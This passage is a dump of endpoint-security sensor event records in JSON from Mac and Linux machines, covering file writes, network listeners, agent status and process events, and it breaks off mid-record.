-{"event_simpleName":"MachOFileWritten","ContextTimeStamp":"1625622611.845","ConfigStateHash":"3967242894","MachOSubType":"3","ContextProcessId":"364938429384226082","Size":"0","ContextThreadId":"0","aip":"208.165.30.176","SHA256HashData":"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198","FileIdentifier":"04000001000000000000000000000000ac41270400000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"MachOFileWrittenMacV3","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677479336","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl"} -{"event_simpleName":"NetworkListenIP6","ContextTimeStamp":"1625622608.014","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP6":"0:0:0:0:0:0:0:0","ConfigStateHash":"3967242894","ConnectionFlags":"0","ContextProcessId":"364938390018585510","RemotePort":"0","aip":"208.165.30.176","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"8770","Entitlements":"15","name":"NetworkListenIP6MacV10","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff44564c2f8d76394cb25c31ab","ConnectionDirection":"2","InContext":"0","timestamp":"1625677478929","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"CurrentSystemTags","ConfigStateHash":"3090255842","aip":"208.87.57.118","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","SystemTableIndex":"0","Entitlements":"15","name":"CurrentSystemTagsMacV1","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","EffectiveTransmissionClass":"0","aid":"ffffffff62714a708030d494ca0a7e60","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677502693","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NewExecutableWritten","ContextTimeStamp":"1625677533.027","ConfigStateHash":"1620585913","ContextProcessId":"362208380891022165","Size":"596224","ContextThreadId":"0","aip":"208.24.116.10","SHA256HashData":"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewExecutableWrittenMacV2","id":"ffffffff-1111-11eb-985c-02152dd35bc1","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677533060","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader","VnodeModificationType":"0"} -{"event_simpleName":"LfoUploadDataComplete","LfoUploadFlags":"4","AttemptNumber":"0","ConfigStateHash":"3090255842","SourceFileName":"/Users/user5/.rbenv/versions/2.6.5/bin/ruby","Size":"3876424","aip":"208.137.65.223","SHA256HashData":"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a","UploadId":"8023668629276690295","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LfoUploadDataCompleteMacV3","id":"ffffffff-1111-11eb-a2ab-024aafff599f","EffectiveTransmissionClass":"2","aid":"fffffffffbea48169985c2c2bae89d1d","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677428827","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LightningLatencyInfo","LightningLatencyState":"3","ConfigStateHash":"3090255842","aip":"208.100.38.84","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LightningLatencyInfoMacV1","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","EffectiveTransmissionClass":"0","aid":"ffffffffd452449b8d1eb7d85b146650","timestamp":"1625677453146","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NeighborListIP4","ConfigStateHash":"1620585913","NeighborList":"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|","aip":"208.93.56.66","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP4MacV1","id":"ffffffff-1111-11eb-9dc0-06c6f5278873","EffectiveTransmissionClass":"3","aid":"ffffffff8eb649cf8d82be1e65629a0e","timestamp":"1625677450083","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ZipFileWritten","ContextTimeStamp":"1625677454.557","ConfigStateHash":"3090255842","ContextProcessId":"365039419134863763","ContextThreadId":"0","aip":"208.70.175.112","FileIdentifier":"07000001000000000000000000000000b1445a0900000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ZipFileWrittenMacV1","id":"ffffffff-1111-11eb-ab6e-0668ec51180b","EffectiveTransmissionClass":"2","aid":"ffffffff2d984e32b702789b54f0f811","timestamp":"1625677454723","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip"} -{"AgentVersion":"6.24.13701.0","aip":"208.180.129.90","ConfigIDBase":"65994753","BiosReleaseDate":"01/06/2021","CpuFeaturesMask":"7494065083858915","ChasisManufacturer":"Apple Inc.","SystemSerialNumber":"C02F649EMD6R","event_platform":"Mac","AgentLoadFlags":"0","CpuVendor":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","BiosVersion":"1554.80.3.0.0 (iBridge: 18.16.14347.0.0,0)","CpuSignature":"591594","EffectiveTransmissionClass":"0","MoboProductName":"Mac-E1008331FDC96864","timestamp":"1625677460451","MicrocodeSignature":"16045690984229358334","event_simpleName":"AgentOnline","ContextTimeStamp":"1625677445.731","SystemProductName":"MacBookPro16,1","MoboManufacturer":"Apple Inc.","ConfigStateHash":"3967242894","ConfigBuild":"1007.4.0013701.1","SystemSku":" ","SensorGroupingTags":"","ConfigurationVersion":"10","AgentLocalTime":"1625677445.731","BiosManufacturer":"Apple Inc.","Entitlements":"15","name":"AgentOnlineMacV13","ConfigIDPlatform":"4","ComputerName":"comp2","ChassisType":"9","ConfigIDBuild":"13701","SystemManufacturer":"Apple Inc.","aid":"ffffffffbea440b9aad8b5bf222d303f","ProvisionState":"1","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"Zero"} -{"event_simpleName":"CriticalFileAccessed","ContextTimeStamp":"1625677438.515","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053399098988534","ContextThreadId":"0","aip":"208.93.153.49","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileAccessedMacV1","id":"ffffffff-1111-11eb-956a-02748d01bd3d","EffectiveTransmissionClass":"2","aid":"ffffffff8eca418b7a861be9c5f7de1d","timestamp":"1625677438553","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/daemon.plist"} -{"MajorVersion":"19","event_simpleName":"OsVersionInfo","OSVersionFileData":"3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0a3c21444f435459504520706c697374205055424c494320222d2f2f4170706c652f2f44544420504c49535420312e302f2f454e222022687474703a2f2f7777772e6170706c652e636f6d2f445444732f50726f70657274794c6973742d312e302e647464223e0a3c706c6973742076657273696f6e3d22312e30223e0a3c646963743e0a093c6b65793e50726f647563744275696c6456657273696f6e3c2f6b65793e0a093c737472696e673e3139483532343c2f737472696e673e0a093c6b65793e50726f64756374436f707972696768743c2f6b65793e0a093c737472696e673e313938332d32303231204170706c6520496e632e3c2f737472696e673e0a093c6b65793e50726f647563744e616d653c2f6b65793e0a093c737472696e673e4d6163204f5320583c2f737472696e673e0a093c6b65793e50726f647563745573657256697369626c6556657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e50726f6475637456657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e694f53537570706f727456657273696f6e3c2f6b65793e0a093c737472696e673e31332e363c2f737472696e673e0a3c2f646963743e0a3c2f706c6973743e0a","ConfigStateHash":"3967242894","AgentVersion":"6.24.13701.0","aip":"208.180.129.90","MinorVersion":"6","OSVersionString":"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OsVersionInfoMacV3","RFMState":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","OSVersionFileName":"/System/Library/CoreServices/SystemVersion.plist","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677462356","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ConfigBuild":"1007.8.0010912.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1284133626","ConfigStateData":"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV1","aip":"208.233.129.250","id":"ffffffff-1111-11eb-8e88-068a8894a447","aid":"ffffffff4f4044b689d6420d303e4ecd","timestamp":"1625677436454","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"1333055909","aip":"208.203.151.21","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53","DownloadPort":"443","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"LFODownloadConfirmationLinV1","CompletionEventId":"Event_KmaExtDownloadCompleteLinV1","id":"ffffffff-1111-11eb-8dee-0201f64cca29","aid":"ffffffff88b948c6abeeee910f6d8c33","timestamp":"1625677365906","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"KernelModuleArchiveExt11611"} -{"event_simpleName":"TarFileWritten","ContextTimeStamp":"1625677353.633","ConfigStateHash":"3090255842","ContextProcessId":"365049009681176519","ContextThreadId":"0","aip":"208.23.66.52","FileIdentifier":"050000010000000000000000000000005749420100000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"TarFileWrittenMacV1","id":"ffffffff-1111-11eb-9497-028a0bfcf603","EffectiveTransmissionClass":"2","aid":"ffffffffe6244708bd09a6c111f63f4a","timestamp":"1625677353895","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem"} -{"event_simpleName":"AgentConnect","ConfigStateHash":"3967242894","NetworkContainmentState":"0","VerifiedCertificate":"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf","aip":"208.42.18.78","ConfigIDBase":"65994753","FailedConnectCount":"404","ConnectType":"1","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"AgentConnectMacV5","ConfigIDPlatform":"4","PreviousConnectTime":"1625673963.331","id":"ffffffff-1111-11eb-ba54-02a3616f6acd","ConfigIDBuild":"13701","ConnectTime":"1625677350.208","EffectiveTransmissionClass":"2","aid":"ffffffff2977460db2898ece881a9358","ProvisionState":"0","timestamp":"1625677350466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"3090255842","aip":"208.25.66.51","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys","DownloadPort":"443","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LFODownloadConfirmationMacV1","CompletionEventId":"Event_ChannelDataDownloadCompleteMacV1","id":"ffffffff-1111-11eb-8b09-069ee8920171","EffectiveTransmissionClass":"0","aid":"ffffffff5e8b4724aa10088c4f71cd9a","timestamp":"1625677525235","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"C-00000503-00000000-00000001.sys"} -{"event_simpleName":"AsepFileChange","ContextTimeStamp":"1625677482.148","ConfigStateHash":"1620585913","ContextProcessId":"364936256754041721","ContextThreadId":"0","aip":"208.140.108.235","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"AsepFileChangeMacV1","id":"ffffffff-1111-11eb-9e50-064be6e56df7","EffectiveTransmissionClass":"2","aid":"fffffffff1a64286a233d09974b1b377","timestamp":"1625677482403","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs","VnodeModificationType":"6"} -{"event_simpleName":"TerminateProcess","RawProcessId":"76482","ContextTimeStamp":"1625677510.959","ConfigStateHash":"1284133626","ContextProcessId":"130732827553316","ContextThreadId":"0","aip":"208.194.125.248","ConfigBuild":"1007.8.0010912.1","event_platform":"Lin","TargetProcessId":"130732827553316","Entitlements":"15","name":"TerminateProcessLinV2","id":"ffffffff-1111-11eb-97d0-02b2813216eb","EffectiveTransmissionClass":"2","aid":"ffffffffdd094539a02b394c69a70aaf","timestamp":"1625677511067","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ConfigBuild":"1007.4.0013701.1","event_simpleName":"FirewallEnabled","event_platform":"Mac","ConfigStateHash":"3090255842","Entitlements":"15","name":"FirewallEnabledMacV1","aip":"208.31.114.187","id":"ffffffff-1111-11eb-a9e6-067d21325a03","EffectiveTransmissionClass":"2","aid":"ffffffff70cf4070af024397f25007c7","timestamp":"1625677372544","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"FsVolumeUnmounted","VolumeName":"Install Google Drive","ContextTimeStamp":"1625677332.283","ConfigStateHash":"3090255842","aip":"208.105.245.7","VolumeMediaBSDName":"disk2s2","VolumeMountPoint":"/private/tmp/KSInstallAction.dn6J5Xa1M4/m","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"FsVolumeUnmountedMacV1","id":"ffffffff-1111-11eb-8fd9-06866dcbd3d5","EffectiveTransmissionClass":"2","aid":"ffffffffed984e248973f3ada1eb543d","timestamp":"1625677334451","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677474.525","ConfigStateHash":"2300098580","ConnectionFlags":"0","ContextProcessId":"328911864662804336","RemotePort":"0","aip":"208.231.69.37","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"23165","Entitlements":"15","name":"NetworkListenIP4LinV5","id":"ffffffff-1111-11eb-88fd-06a17d0fdc05","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff2a0d484da8f7a9cf8bde7164","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677474879","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ELFFileWritten","ContextTimeStamp":"1625677526.828","ConfigStateHash":"1620585913","ContextProcessId":"363122200934575406","Size":"38798952","ContextThreadId":"0","aip":"208.24.116.10","SHA256HashData":"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027","FileIdentifier":"040000010000000000000000000000006793f80200000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ELFFileWrittenMacV1","id":"ffffffff-1111-11eb-985c-02152dd35bc1","ELFSubType":"4","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677527114","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe"} -{"MajorVersion":"4","event_simpleName":"OsVersionInfo","OSVersionFileData":"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a","BootArgs":"BOOT_IMAGE\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\u003dUUID\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\u003dtty0 console\u003dttyS0,115200n8 net.ifnames\u003d0 biosdevname\u003d0 nvme_core.io_timeout\u003d4294967295 rd.emergency\u003dpoweroff rd.shell\u003d0","ConfigStateHash":"3712162471","AgentVersion":"6.19.11611.0","aip":"208.203.151.21","MinorVersion":"14","OSVersionString":"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"OsVersionInfoLinV4","RFMState":"1","id":"ffffffff-1111-11eb-93d4-0624c36f3a79","OSVersionFileName":"/etc/os-release","aid":"ffffffff2d1245c0a32d5efcf9351272","timestamp":"1625677383466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"CriticalFileModified","ContextTimeStamp":"1625677439.099","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"364849347227309005","ContextThreadId":"0","aip":"208.216.154.14","FileIdentifier":"04000001000000000000000000000000cdf3100100000000","ConfigBuild":"1007.4.0013701.1","UID":"0","USN":"89566685","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileModifiedMacV2","id":"ffffffff-1111-11eb-9262-0268ab613b49","EffectiveTransmissionClass":"2","aid":"ffffffff761b4a7d9962dd9e7e776044","timestamp":"1625677439398","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/user9.plist/"} -{"event_simpleName":"NeighborListIP6","ConfigStateHash":"3090255842","NeighborList":"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|","aip":"208.230.229.237","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP6MacV1","id":"ffffffff-1111-11eb-ac8a-06b5e1186139","EffectiveTransmissionClass":"3","aid":"ffffffff01c7450180352a7c58a28fb4","timestamp":"1625677489786","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677382.785","UserName":"user3","ConfigStateHash":"1325353086","ContextProcessId":"364952259879648742","Size":"8052","ContextThreadId":"0","aip":"208.182.203.47","SHA256HashData":"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6","FileIdentifier":"04000001000000000000000000000000ef07570000000000","ConfigBuild":"1007.4.0013806.1","event_platform":"Mac","IsOnRemovableDisk":"0","Entitlements":"15","name":"NewScriptWrittenMacV3","id":"ffffffff-1111-11eb-9dc1-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffffcebd42c0890d59b54279d3d3","timestamp":"1625677383057","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh"} -{"event_simpleName":"SystemCapacity","ConfigStateHash":"1620585913","aip":"208.145.211.220","CpuClockSpeed":"2400000000","PhysicalCoreCount":"8","CpuFeaturesMask":"7494065083908067","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LogicalCoreCount":"16","Entitlements":"15","name":"SystemCapacityMacV1","CpuVendor":"0","CpuProcessorName":"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz","id":"ffffffff-1111-11eb-b714-066001392751","CpuSignature":"591597","EffectiveTransmissionClass":"3","aid":"fffffffff2c7432859ff6bbe1a0bd6af","ProcessorPackageCount":"1","MemoryTotal":"17179869184","timestamp":"1625677387216","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"FirmwareAnalysisStatus","ConfigStateHash":"3090255842","FirmwareAnalysisEclControlInterfaceVersion":"0","aip":"208.71.69.91","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","FirmwareAnalysisEclConsumerInterfaceVersion":"0","BootTimeFunctionalityLevel":"255","ReasonOfFunctionalityLevel":"3","CurrentFunctionalityLevel":"2","Entitlements":"15","name":"FirmwareAnalysisStatusMacV2","id":"ffffffff-1111-11eb-ba57-0214a0d89bf7","EffectiveTransmissionClass":"0","aid":"ffffffff0d7b4d839912e55b4755e85b","timestamp":"1625677368429","cid":"ffffffff15754bcfb5f9152ec7ac90ac","PciAttachmentState":"65535"} -{"OutOctets":"0","CreationTimeStamp":"","aip":"208.160.204.13","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"utun2","InDiscards":"0","InterfaceIndex":"17","event_platform":"Mac","InterfaceType":"1","id":"ffffffff-1111-11eb-a272-0294ad12fbe7","PhysicalAddressLength":"0","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677504544","LocalAddressIP4":"208.27.234.231","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"3090255842","PhysicalAddress":"","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressIP4MacV1","aid":"ffffffff557f4b99a0afdea9ce8cd6fa","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"CommandLine":"uname -a","ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","Entitlements":"15","GID":"0","ImageFileName":"/bin/uname","MD5HashData":"894356eb59e279696c304f07091b7fde","NDRoot":"321385814512398584","ParentProcessId":"321385814512398584","ProcessEndTime":"1604855099.126","ProcessGroupId":"0","ProcessStartTime":"1604855099.126","RGID":"0","RUID":"0","RawProcessId":"51342","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa","SVGID":"0","SVUID":"0","SessionProcessId":"314116638974342642","SourceProcessId":"321385814512398584","SourceThreadId":"0","TargetProcessId":"321385814512398605","UID":"0","aid":"ffffffff70d140ca9ba97f0dddd14137","aip":"208.216.134.209","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-ac87-06decddc17a1","name":"ProcessRollup2LinV5","timestamp":"1604855099681"} -{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"317713210176499254","ContextThreadId":"0","ContextTimeStamp":"1604855096.730","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"28987","SHA256HashData":"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"317713210176499254","aid":"ffffffff75fc48f15cfe5f095e605c4c","aip":"208.3.106.158","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-809e-02fff4e55a49","name":"EndOfProcessMacV14","timestamp":"1604855099646"} -{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"38188","ConHostProcessId":"3099352216141","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextData":"","ContextProcessId":"3100508103359","ContextThreadId":"93436292950223","ContextTimeStamp":"1604855097.926","CreateProcessCount":"0","CycleTime":"2937514388","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"1","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"2","GenericFileWrittenCount":"0","ImageSubsystem":"3","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"7500000","MaxThreadCount":"4","ModuleLoadCount":"38","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"3099350649383","PrivilegedProcessH